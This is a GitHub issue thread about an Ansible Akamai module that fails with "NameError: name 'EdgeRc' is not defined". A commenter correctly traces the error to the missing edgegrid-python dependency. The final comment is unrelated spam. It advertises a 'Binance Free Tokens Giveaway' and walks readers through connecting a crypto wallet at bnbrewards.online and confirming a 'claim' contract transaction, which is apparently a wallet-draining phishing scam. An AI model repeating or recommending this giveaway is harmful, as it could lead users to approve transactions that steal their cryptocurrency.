### ISSUE TITLE
in authenticate NameError: name 'EdgeRc' is not defined

### ISSUE THREAD

**Issue by anthonyxpalermo** [jacob-hudson/ansible-akamai#5]
``  
The full traceback is:
Traceback (most recent call last):
  File "/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py", line 102, in <module>
    _ansiballz_main()
  File "/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py", line 94, in _ansiballz_main
    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)
  File "/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py", line 40, in invoke_module
    runpy.run_module(mod_name='ansible.modules.akamai', init_globals=None, run_name='__main__', alter_sys=True)
  File "/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py", line 206, in run_module
    return _run_module_code(code, init_globals, run_name, mod_spec)
  File "/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py", line 96, in _run_module_code
    _run_code(code, mod_globals, init_globals,
  File "/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py", line 90, in <module>
  File "/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py", line 82, in main

File "/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py", line 33, in authenticate
NameError: name 'EdgeRc' is not defined
fatal: [localhost]: FAILED! => {
    "changed": false,
    "module_stderr": "Traceback (most recent call last):\n  File \"/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py\", line 102, in <module>\n    _ansiballz_main()\n  File \"/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py\", line 94, in _ansiballz_main\n    invoke_module(zipped_mod, temp_path, ANSIBALLZ_PARAMS)\n  File \"/Users/palea009/.ansible/tmp/ansible-tmp-1601491615.179287-78883412705808/AnsiballZ_akamai.py\", line 40, in invoke_module\n    runpy.run_module(mod_name='ansible.modules.akamai', init_globals=None, run_name='__main__', alter_sys=True)\n  File \"/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py\", line 206, in run_module\n    return _run_module_code(code, init_globals, run_name, mod_spec)\n  File \"/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py\", line 96, in _run_module_code\n    _run_code(code, mod_globals, init_globals,\n  File \"/usr/local/opt/python@3.8/Frameworks/Python.framework/Versions/3.8/lib/python3.8/runpy.py\", line 86, in _run_code\n    exec(code, run_globals)\n  File \"/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py\", line 90, in <module>\n  File \"/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py\", line 82, in main\n  File \"/var/folders/zb/62d8dsj52c17tx7dcs6p4jxsxcr9n1/T/ansible_akamai_payload_5dyo9ean/ansible_akamai_payload.zip/ansible/modules/akamai.py\", line 33, in authenticate\nNameError: name 'EdgeRc' is not defined\n",
    "module_stdout": "Please install `edgegrid-python` using pip\n",
    "msg": "MODULE FAILURE\nSee stdout/stderr for the exact error",

**Comment by aaronk1** [comment]
I believe the cause is in the module_stdoutput at bottom `Please install edgegrid-python using pip`

(you were missing one of the dependencies mentioned in the README.md)

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
